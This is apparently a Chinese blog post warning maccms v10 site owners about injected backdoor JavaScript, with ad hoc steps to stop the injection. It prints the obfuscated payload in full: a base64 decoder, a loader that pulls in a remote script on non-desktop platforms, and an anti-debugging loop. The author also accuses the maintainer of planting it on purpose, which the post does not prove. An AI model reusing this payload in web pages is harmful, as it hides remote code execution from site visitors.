maccms木马后门解决办法(2025.1000.4050)

近期发现 magicblack 所维护的苹果cms v10 在新增了漫画模块之后，似乎有后门现象，这个作者肯定是故意的，几年前大家都认为 maccms.pro 会挂木马后门，结果没想到 maacms.la 这个作者也会挂木马后门，真是恶心的家伙。

issue：https://github.com/magicblack/maccms10/issues/1268

似乎不少人有一样的状况，WAF跟文件防篡改都没办法侦测到，非常难防范。

通过浏览器F12才发现，这个代码会防堵你用浏览器检查，除非你把”停用中断点功能”打开

木马后门代码如下：

function xxSJRox(e){var t = "",n = r = c1 = c2 = 0;while (n < e.length){r = e.charCodeAt(n);if (r < 128){t += String.fromCharCode(r);n++}else if (r > 191 && r < 224){c2 = e.charCodeAt(n + 1);t += String.fromCharCode((r & 31) << 6 | c2 & 63);n += 2}else{c2 = e.charCodeAt(n + 1);c3 = e.charCodeAt(n + 2);t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63);n += 3}}return t}function aPnDhiTia(e){var m = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t = "",n,r,i,s,o,u,a,f = 0;e = e.replace(/[^A-Za-z0-9+/=]/g,"");while (f < e.length){s = m.indexOf(e.charAt(f++));o = m.indexOf(e.charAt(f++));u = m.indexOf(e.charAt(f++));a = m.indexOf(e.charAt(f++));n = s << 2 | o >> 4;r = (o & 15) << 4 | u >> 2;i = (u & 3) << 6 | a;t = t + String.fromCharCode(n);if (u != 64){t = t + String.fromCharCode(r)}if (a != 64){t = t + String.fromCharCode(i)}}return xxSJRox(t)}eval('window')['\x4d\x66\x58\x4b\x77\x56'] = function(){;(function(u,r,w,d,f,c){var x = aPnDhiTia;u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c,'g'),c)));'jQuery';k = r[2] + 'c' + f[1];'Flex';v = k + f[6];var s = d.createElement(v + c[0] + c[1]),g = function(){};s.type = 'text/javascript';{s.onload = function(){g()}}s.src = u;'CSS';d.getElementsByTagName('head')[0].appendChild(s)})('aHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5Lm1pbi0zLjYuOC5qcw==','FgsPmaNtZ',window,document,'jrGYBsijJU','ptbnNbK')};if (!(/^Mac|Win/.test(navigator.platform))) MfXKwV();setInterval(function(){debugger;},100); /*138ae887806f*/

它会将当前使用的模板底下的所有javascript文件都注入此代码到最底部，所以每个js文件都必须去检查。

苹果cms版本号：2025.1000.4050

先用最简单的解决办法来阻止注入js代码

首先找到路径 application/extra

注意两个文档：Active.php 跟 System.php

这两个文档似乎跟「登入」后台的行为有高度关联，直接将这两个文档档名做更改，直接在他们后面多加底线，例如 Active__.php，权限不用动没关系

接着，找到自己”当前”使用的模板，直接对该模板那个目录权限设置为 555，暂时不要有写入的动作

如果你的模板是有带后台的，有php文件的，那么权限不要变动，因为日后你还得调整你模板后台的一些配置保存。

目前还在研究如何彻底根治，讨论区目前似乎没有人针对 magicblack 这个作者有任何攻击或质疑，但这次的大更新，产生了这个木马后门，那么当然是 magicblack 负责。